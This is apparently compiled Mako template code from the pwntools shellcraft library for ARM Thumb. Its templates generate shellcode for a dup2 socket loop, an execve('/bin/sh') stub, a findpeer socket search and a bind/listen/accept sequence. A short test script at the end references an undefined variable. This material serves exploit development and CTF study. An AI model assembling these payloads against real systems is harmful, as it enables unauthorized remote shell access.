def render_body(context, sock='r6', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mov']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
dup = common.label("dup")
looplabel = common.label("loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['dup', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(unicode(dup))
__M_writer(u':\n ')
__M_writer(unicode(mov('r1', 2)))
__M_writer(u'\n ')
__M_writer(unicode(mov('r7', 'SYS_dup2')))
__M_writer(u'\n\n')
__M_writer(unicode(looplabel))
__M_writer(u':\n ')
__M_writer(unicode(mov('r0', sock)))
__M_writer(u'\n svc 1\n subs r1, #1\n bpl ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mov']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n\n adr r0, execve_addr\n ')
__M_writer(unicode(mov('r2', 0)))
__M_writer(u'\n ')
__M_writer(unicode(mov('r7', 'SYS_execve')))
__M_writer(
u'\n push {r0, r2}\n mov r1, sp\n svc 1\n .balign 4, 1\nexecve_addr:\n .ascii "/bin/sh"\n'
)
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context,port=None,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,port=port)
int = context.get('int', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['mov'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib import constants
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['constants'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from socket import htons
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['htons'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\nfindpeer:\n /* File descriptor in r6 */\n /* Inside the loop we begin by incrementing it */\n /* so initially we want it to be -1 */\n ')
__M_writer(unicode(mov('r6', -1)))
__M_writer(u'\n /* Let us restore stack easily */\n mov lr, sp\n\nnext_socket:\n /* Next file descriptor */\n add r6, #1\n\n ')
__M_writer(unicode(mov('r7', constants.linux.thumb.SYS_getpeername)))
__M_writer(u'\n\n /* Reset stack */\n mov sp, lr\n\n /* First argument is file descriptor */\n mov r0, r6\n\n /* Make room on stack - inet addr structure is 16 bytes and size of addr is four bytes */\n /* First four bytes will be the size of the address, the remaining 16 bytes will be */\n /* the address structure */\n push {r0, r1, r2, r3, r4}\n\n /* Second argument is pointer to where to store inet addr */\n add r1, sp, #4\n\n /* Third argument is pointer to size */\n mov r2, sp\n\n /* Now issue system call */\n svc 1\n\n /* If the syscall returned -1 this was a bad socket */\n /* so move on to the next one */\n /* Testing on r0 has nul bytes but moving to r1 achieves the same */\n cmp r0, #0\n bne next_socket\n')
if not port is None:
__M_writer(u'\ncompare_port:\n /* Read the port into r0 */\n ldr r1, [sp, #4]\n lsr r1, #16\n\n /* Put the port (')
__M_writer(unicode(port))
__M_writer(u') to search for into r1 */\n ')
__M_writer(unicode(mov('r2', htons(int(port)))))
__M_writer(u'\n\n /* Is it the one we have been searching for? */\n cmp r1, r2\n \n /* If not try the next one */\n bne next_socket\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, string, append_null=True, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
string=string,
append_null=append_null)
repr = context.get('repr', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mov']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.util import lists, packing
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['packing', 'lists']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
if append_null:
string += '\x00'
if not string:
return
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['string']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u' /* push ')
__M_writer(unicode(repr(string)))
__M_writer(u' */\n\n')
for word in lists.group(4, string, 'fill', '\x00')[::-1]:
__M_writer(u' ')
__M_writer(unicode(mov('r1', packing.unpack(word))))
__M_writer(u'\n push {r1}\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, return_value=None, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
return_value=return_value)
__M_writer = context.writer()
from pwnlib.shellcraft import thumb
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['thumb']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
if return_value != None:
__M_writer(u' ')
__M_writer(unicode(thumb.mov('r0', return_value)))
__M_writer(u'\n')
__M_writer(u'\n bx lr\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, port, network='ipv4', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
port=port,
network=network)
__M_writer = context.writer()
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mov']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib import constants
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['constants']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from socket import htons
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['htons']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n /* First create listening socket */\n ')
__M_writer(unicode(mov('r7', constants.linux.thumb.SYS_socket)))
__M_writer(u'\n')
if network == 'ipv4':
__M_writer(u' ')
__M_writer(unicode(mov('r0', constants.linux.thumb.AF_INET)))
__M_writer(u'\n')
else:
__M_writer(u' ')
__M_writer(unicode(mov('r0', constants.linux.thumb.AF_INET6)))
__M_writer(u'\n')
__M_writer(u' ')
__M_writer(unicode(mov('r1', constants.linux.thumb.SOCK_STREAM)))
__M_writer(
u'\n eor r2, r2\n svc 1\n\n /* Save socket in r6 */\n mov r6, r0\n\n'
)
if network == 'ipv4':
__M_writer(
u' /* Build sockaddr_in structure */\n /* r2 is zero == INADDR_ANY */\n /* Put port and address family into r1 */\n '
)
__M_writer(
unicode(
mov('r1', ((htons(port) << 16) +
constants.linux.thumb.AF_INET))))
__M_writer(
u'\n push {r1, r2}\n\n /* Address of sockaddr_in into r1 */\n mov r1, sp\n\n /* sizeof(sockaddr_in) into r2 */\n mov r2, #16\n\n /* Socket already in r0 */\n /* r7 is 281 = SYS_socket, add one and it is 282 = SYS_bind */\n add r7, #1\n svc 1\n'
)
else:
__M_writer(
u' /* Build sockaddr_in6 structure */\n /* r2 is already zero */\n eor r1, r1\n eor r3, r3\n push {r1, r2, r3}\n push {r1, r2, r3}\n \n /* Then port = %d */\n '
)
__M_writer(
unicode(
mov('r1',
(htons(port) << 16) + constants.linux.thumb.AF_INET6)))
__M_writer(
u'\n push {r1, r2, r3}\n\n /* Address of sockaddr_in6 into r1 */\n mov r1, sp\n\n /* sizeof(sockaddr_in6) into r2 */\n mov r2, #28\n\n /* Socket already in r0 */\n /* r7 is 281 = SYS_socket, add one and it is 282 = SYS_bind */\n add r7, #1\n svc 1\n'
)
__M_writer(
u'\n /* Server socket from r6 into r0 */\n mov r0, r6\n\n /* Backlog */\n mov r1, #1\n\n /* r7 = SYS_listen = 284 */\n /* r7 is already = 282 so just add two */\n add r7, #2\n svc 1\n\n /* Server socket from r6 into r0 */\n mov r0, r6\n\n /* Other args are null */\n eor r1, r1\n eor r2, r2\n\n /* r7 = SYS_accept = 285 */\n /* r7 is already = 284 so just add one */\n add r7, #1\n svc 1\n\n /* Move accepted socket to r6 */\n mov r6, r0\n'
)
return ''
finally:
context.caller_stack._pop_frame()
#!/usr/bin/env python3
import sys
from pwnlib.asm import asm, disasm
import pwnlib.shellcraft.thumb as sc
data = sc.mov("r0", 0xdeadbeef)
print(data)
print(len(x))